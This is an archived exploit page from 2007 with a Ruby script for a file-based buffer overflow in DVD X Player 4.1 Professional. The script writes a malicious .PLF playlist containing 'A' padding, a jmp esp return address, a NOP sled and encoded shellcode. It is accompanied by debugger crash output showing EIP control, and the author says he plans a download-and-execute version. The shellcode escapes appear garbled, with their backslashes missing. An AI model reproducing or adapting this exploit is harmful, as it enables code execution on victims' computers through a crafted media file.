DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : DVD X Player 4.1 Professional .PLF file Buffer Overflow Exploit
# Published : 2007-06-02
# Author : n00b
# Previous Title : PHP 5.2.3 Tidy extension Local Buffer Overflow Exploit
# Next Title : MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
#!/usr/bin/env ruby
####################################################################################################
#0day DVD X Player 4.1 Professional .PLF file buffer over flow found by n00b and poc by n00b.
#First of all DVD x is prone to a buffer-overflow when playing an overly long file name inside
#A .plf file Which is  InterVideo WinDVD Play list File but also Dvd x uses this file as a play
#list file.Also the seh handlers got smashed so seh over-write is possible.Upon successful 
#Exploitation calc will open and if it don't make sure you have the right jmp esp%
#Tested on :win xp service pack 2 
#Vendors web site: http://www.dvd-x-player.com/
#Esp was pointing 277 byte's in to the buffer.
#And eip was over written 261 byte's in  to the buffer .So i made the 17 byte's up with nop's sled.
#I will be writing a c version as it will be nice to have download execute shell code as the program
#Doesn't shut down but runs in the back ground
####################################################################################################
#                                                      \Debug info//
#(65c.98c): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000001 ebx=77f6cf47 ecx=04450e60 edx=00000042 esi=04450348 edi=6405341c
#eip=41414141 esp=0012f4ac ebp=01adfe50 iopl=0         nv up ei pl nz na po nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
#41414141 ??              ???
#0:000> g
#(65c.98c): Access violation - code c0000005 (first chance)
#First chance exceptions are reported before any exception handling.
#This exception may be expected and handled.
#eax=00000000 ebx=00000000 ecx=41414141 edx=7c9037d8 esi=00000000 edi=00000000
#eip=41414141 esp=0012f0dc ebp=0012f0fc iopl=0         nv up ei pl zr na pe nc
#cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
#41414141 ??              ???
###################################################################################  
#Shouts:  - Str0ke - Marsu  - SM - Aelphaeis - vade79 - c0ntex ~ Kevin Finisterre
###################################################################################
#Credit goes to n00b for writing exploit and finding bug. !!! < Enjoy >.
###################################################################################   

Header1 = "x63x3Ax5c"  # C:

bof =   'A'* 257    #Fill our bufer with sh!t.

shell = 
"xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"+ #351 bytes
"x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"+
"x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"+
"x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"+
"x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4ax4ex46x54"+
"x42x50x42x50x42x30x4bx58x45x54x4ex33x4bx38x4ex57"+
"x45x30x4ax37x41x30x4fx4ex4bx58x4fx44x4ax41x4bx38"+
"x4fx35x42x42x41x30x4bx4ex49x34x4bx58x46x33x4bx58"+
"x41x30x50x4ex41x33x42x4cx49x39x4ex4ax46x58x42x4c"+
"x46x37x47x30x41x4cx4cx4cx4dx50x41x50x44x4cx4bx4e"+
"x46x4fx4bx53x46x55x46x32x46x30x45x47x45x4ex4bx48"+
"x4fx35x46x32x41x50x4bx4ex48x36x4bx58x4ex50x4bx54"+
"x4bx58x4fx35x4ex31x41x50x4bx4ex4bx38x4ex41x4bx38"+
"x41x30x4bx4ex49x38x4ex45x46x52x46x50x43x4cx41x53"+
"x42x4cx46x46x4bx48x42x44x42x43x45x38x42x4cx4ax37"+
"x4ex50x4bx48x42x44x4ex50x4bx48x42x57x4ex51x4dx4a"+
"x4bx48x4ax46x4ax30x4bx4ex49x30x4bx58x42x58x42x4b"+
"x42x30x42x50x42x30x4bx48x4ax46x4ex43x4fx55x41x43"+
"x48x4fx42x56x48x55x49x58x4ax4fx43x38x42x4cx4bx57"+
"x42x55x4ax46x4fx4ex50x4cx42x4ex42x46x4ax36x4ax49"+
"x50x4fx4cx48x50x30x47x35x4fx4fx47x4ex43x46x41x56"+
"x4ex46x43x56x50x42x45x56x4ax37x45x36x42x30x5a"


ret = "x27xB1xFAx77"  # 4bytes // Jmp esp% in shlwapi.dll

nop = "x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90" # Ffs my nop sled 16byte's

bof2 ='B'* 388  # fill the rest of the file up with sh!t.

Header2 = "x2Ex6Dx70x33" #  .mp3


n00b = Header1 + bof + ret + nop + shell + bof2 + Header2  # Build the file.
 
File.open( "Exploit.plf","w") do |the_file|  # Open the file for writing  

the_file.puts (n00b)  # Place data from variable. 

the_file.close  # Close
 
end

# www.Syue.com [2007-06-02]